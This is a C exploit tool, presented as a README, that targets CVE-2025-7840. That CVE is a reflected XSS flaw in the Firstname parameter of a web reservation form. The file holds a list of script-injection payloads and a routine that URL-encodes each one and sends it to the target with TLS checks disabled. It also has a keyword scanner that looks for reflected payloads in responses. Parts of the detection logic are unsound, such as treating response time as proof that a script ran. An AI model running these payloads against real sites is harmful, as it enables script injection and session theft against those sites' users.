README.md
Rendering markdown...
/*
* Author : Byte Reaper
* Telegram : @ByteReaper0
* CVE : CVE-2025-7840
* Vulnerability : Cross-Site Scripting (XSS)
* Description :
* This exploit targets a vulnerable web application endpoint that fails to sanitize
* user input on the `Firstname` parameter of a reservation form. By sending a crafted
* GET request to `/index.php?page=reserve&Firstname=<payload>&Lastname=test`, an attacker
* can inject and execute arbitrary JavaScript in the victim’s browser when the response
* is rendered. Features include:
* - Custom payload injection via `-b` option
* - Cookie-based session handling via `-c` option
* - Verbose logging for request/response analysis via `-v` option
*/
#include<stdio.h>
#include"argparse.h"
#include <curl/curl.h>
#include <unistd.h>
#include <string.h>
#include <time.h>
#include <stdlib.h>
#define FULL_URL 1024
int getPayload = 0;
int verbose = 0;
const char *url = NULL;
const char *yourIP = NULL;
const char *selecetPayload = NULL;
const char *nameFileCookie = NULL;
int selecetCookie = 0;
int showOne = 0;
int port = 0;
const char *payloadXss[] =
{
"<script\x0Ctype=\"text/javascript\">alert(1);</script>",
"<script\x2Ftype=\"text/javascript\">alert(1);</script>",
"<script>setTimeout(function(){alert('XSS')}, 3000);</script>",
"<script>for(let i=0;i<1e9;i++){};alert('XSS')</script>",
"<script>var t = Date.now(); while(Date.now() - t < 5000); alert(1);</script>",
"<script>let i=0; function loop(){if(i++<100000) requestAnimationFrame(loop); else alert('done')} loop();</script>",
"<script>let i=0; let x = setInterval(()=>{if(i++==30){clearInterval(x); alert(1);}},100);</script>"
};
const char *key[] =
{
"alert(",
"<script>",
"</script>",
"javascript:alert",
"<svg/onload=",
"<img src=x onerror=",
"<body onload=",
"document.cookie",
"<iframe",
"<video",
"<object",
"onmouseover=",
"onerror=",
"eval(",
"confirm(",
"prompt(",
"innerHTML",
"setTimeout(",
"<marquee",
"srcdoc=",
"contenteditable",
"data:text/html",
"<a href=",
"<meta http-equiv="
};
void exitSyscall()
{
__asm__ volatile
(
"mov $0x3C, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:
:"rax","rdi"
);
}
struct Mem
{
char *buffer;
size_t len;
};
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
size_t total = size * nmemb;
struct Mem *m = (struct Mem *)userdata;
char *tmp = realloc(m->buffer, m->len + total + 1);
if (tmp == NULL)
{
printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n");
exitSyscall();
}
m->buffer = tmp;
memcpy(&(m->buffer[m->len]), ptr, total);
m->len += total;
m->buffer[m->len] = '\0';
return total;
}
void sendRequest(const char *targetHost)
{
CURL *curl = curl_easy_init();
char full[FULL_URL];
struct Mem response = {NULL, 0};
response.buffer = NULL;
response.len = 0;
if (verbose)
{
printf("\e[1;37m[+] Cleaning Response ===================================\e[0m\n");
printf("\e[1;33m[+] Response Buffer -> %s\e[0m\n", response.buffer);
printf("\e[1;33m[+] Response Len -> %zu\e[0m\n", response.len);
printf("\e[1;37m==========================================================\e[0m\n");
}
if (getPayload)
{
char *encode1 = curl_easy_escape(curl,
selecetPayload,
0);
if (!encode1)
{
printf("\e[1;31m[-] URL encoding failed for payload + URL\e[0m\n");
exitSyscall();
}
snprintf(full, sizeof(full),
"%s/index.php?page=reserve&Firstname=%s&Lastname=test",
targetHost, encode1);
curl_free(encode1);
if (verbose)
{
printf("\e[1;36m[+] Input Url : %s\e[0m\n", targetHost);
printf("\e[1;36m[+] Full Url : %s\e[0m\n", full);
printf("\e[1;36m[+] Encode Payload : %s\e[0m\n",selecetPayload);
}
goto send_request;
}
int numberPayloads = sizeof(payloadXss) / sizeof(payloadXss[0]);
for (int p = 0; p < numberPayloads; p++)
{
char *encode2 = curl_easy_escape(curl,
payloadXss[p],
0);
if (!encode2)
{
printf("\e[1;31m[-] URL encoding failed for payload + URL\e[0m\n");
exitSyscall();
}
snprintf(full, sizeof(full),
"%s/index.php?page=reserve&Firstname=%s&Lastname=test",
targetHost, encode2);
curl_free(encode2);
if (verbose)
{
if (showOne)
{
printf("\e[1;36m[+] Input Url : %s\e[0m\n", targetHost);
printf("\e[1;36m[+] Full Url : %s\e[0m\n", full);
}
}
send_request:
CURLcode r ;
if (curl == NULL)
{
printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n");
exitSyscall();
}
curl_easy_setopt(curl,
CURLOPT_URL,
full);
if (selecetCookie)
{
curl_easy_setopt(curl,
CURLOPT_COOKIEFILE,
nameFileCookie);
curl_easy_setopt(curl,
CURLOPT_COOKIEJAR,
nameFileCookie);
}
curl_easy_setopt(curl,
CURLOPT_ACCEPT_ENCODING,
"");
curl_easy_setopt(curl,
CURLOPT_FOLLOWLOCATION,
1L);
usleep(1500000);
curl_easy_setopt(curl,
CURLOPT_WRITEFUNCTION,
write_cb);
curl_easy_setopt(curl,
CURLOPT_WRITEDATA,
&response);
curl_easy_setopt(curl,
CURLOPT_CONNECTTIMEOUT,
5L);
curl_easy_setopt(curl,
CURLOPT_TIMEOUT,
10L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYPEER,
0L);
curl_easy_setopt(curl,
CURLOPT_SSL_VERIFYHOST,
0L);
if (verbose)
{
printf("=====================================================================\n");
curl_easy_setopt(curl,
CURLOPT_VERBOSE,
1L);
printf("=====================================================================\n");
}
struct curl_slist *h = NULL;
h = curl_slist_append(h,
"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
h = curl_slist_append(h,
"Accept-Encoding: gzip, deflate, br");
h = curl_slist_append(h,
"Accept-Language: en-US,en;q=0.5");
h = curl_slist_append(h,
"Connection: keep-alive");
h = curl_slist_append(h,
"Referer: http://example.com");
curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h);
if (verbose)
{
printf("\n\e[1;35m[+] Encode Input ========================================\e[0m\n");
printf("\e[1;34m[+] Full Url : %s\e[0m\n", full);
printf("\e[1;35m==========================================================\e[0m\n");
}
usleep(1500000);
clock_t start = clock();
r = curl_easy_perform(curl);
curl_slist_free_all(h);
if (curl)
{
long code = 0;
printf("\e[1;36m[+] Request sent successfully\e[0m\n");
curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE,
&code);
printf("\e[1;32m-> Http Code : %ld\e[0m\n",
code);
if (code >= 200 && code < 300)
{
printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\n",code);
printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[Len] : %d\e[0m\n", response.len);
printf("\e[1;34m[+] Trying to find suspicious words in reply...\e[0m\n");
int numberKey = sizeof(key) / sizeof(key[0]);
clock_t end = clock();
double duration = (double)(end - start) / CLOCKS_PER_SEC;
for (int k = 0; k < numberKey; k++)
{
if (strstr(response.buffer, key[k]) != NULL)
{
printf("\e[1;34m[+] A suspicious word was found in the server's response !!\e[0m\n");
printf("\e[1;34m[+] Word Found : %s\e[0m\n", key[k]);
if (verbose)
{
printf("\e[1;37m\n======================================== [Response Server] ========================================\e[0m\n");
printf("%s\n", response.buffer);
printf("\e[1;32m[Len] : %d\e[0m\n", response.len);
printf("\e[1;37m\n==================================================================================================\e[0m\n");
}
printf("\e[1;34m[+] It is highly likely that the CVE-2025-7840 vulnerability exists on the server !!\e[0m\n");
printf("==========================================================\e[0m\n");
printf("\e[1;34m[+] Trying to check response timing....\e[0m\n");
printf("\e[1;34m[+] Injecting Payload ...\n");
printf("\e[1;34m[+] Time taken: %.2f seconds\e[0m\n", duration);
if (duration >= 5.0)
{
printf("\e[1;34m[+] Possible XSS Executed (Delay Detected)\e[0m\n");
printf("\e[1;34m[+] The server is experiencing a vulnerability (CVE-2025-7840)\e[0m\n");
}
printf("==========================================================\e[0m\n");
}
else
{
printf("\e[1;31m[-] No suspicious words were found in the server response !\e[0m\n");
}
}
}
else
{
printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", code);
}
}
else
{
printf("\e[1;31m[-] Error Send Request, Please Check Your Connection !\e[0m\n");
printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(r));
printf("\e[1;31m[-] Please Check Your Connection...\e[0m\n");
if (verbose)
{
printf("\e[1;33m[+] Example Command Check : ping google.com\e[0m\n");
printf("\e[1;33m[+] Run Command Ping in sys_execve...\e[0m\n");
const char *command = "/bin/ping";
const char *argv[] =
{
"ping",
"-c",
"5",
"google.com",
NULL
};
const char *envp[] = { NULL };
__asm__ volatile
(
"mov $59, %%rax\n\t"
"mov %[command], %%rdi\n\t"
"mov %[argv], %%rsi\n\t"
"mov %[envp], %%rdx\n\t"
"syscall\n\t"
"mov $60, %%rax\n\t"
"xor %%rdi, %%rdi\n\t"
"syscall\n\t"
:
:[command] "r" (command),
[argv] "r" (argv),
[envp] "r" (envp)
:"rax", "rdi", "rsi", "rdx"
);
exitSyscall();
}
}
if (response.buffer)
{
free(response.buffer);
response.buffer = NULL;
response.len = 0;
}
}
curl_easy_cleanup(curl);
}
int main(int argc, const char **argv)
{
printf(
"\e[1;31m"
"▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▖▖▄▖\n"
"▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌▙▌▙▌▛▌\n"
"▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌▙▌ ▌█▌\n"
"\e[1;37m\t Byte Reaper\n\e[0m"
);
printf("\e[1;31m---------------------------------------------------------------------------------------------\e[0m\n");
if (getuid() != 0)
{
printf("\e[1;31m[-] You need to run this as root !\e[0m\n");
printf("\e[1;31m[-] Example Command : sudo ./exploit -u http://target\e[0m\n");
printf("\e[1;31m[-] And Run Exploit , Exit...\e[0m\n");
exitSyscall();
}
struct argparse_option options[] =
{
OPT_HELP(),
OPT_STRING('u',
"url",
&url,
"Enter Target Url"),
OPT_STRING('c',
"cookies",
&nameFileCookie,
"Enter File cookies "),
OPT_STRING('b',
"payload",
&selecetPayload,
"Enter Your Payload For Inject in Target Server "),
OPT_BOOLEAN('v',
"verbose",
&verbose,
"Verbose Mode "),
OPT_END(),
};
struct argparse argparse;
argparse_init(&argparse,
options,
NULL,
0);
argparse_parse(&argparse,
argc,
argv);
if (!url)
{
printf("\e[1;31m[-] Please Enter target Url !\e[0m\n");
printf("\e[1;31m[-] Exemple : ./exploit -u http://target\e[0m\n");
exitSyscall();
}
if (selecetPayload)
{
getPayload = 1;
}
if (nameFileCookie)
{
selecetCookie = 1;
}
if (verbose && showOne == 0)
{
verbose = 1;
showOne = 1;
}
sendRequest(url);
}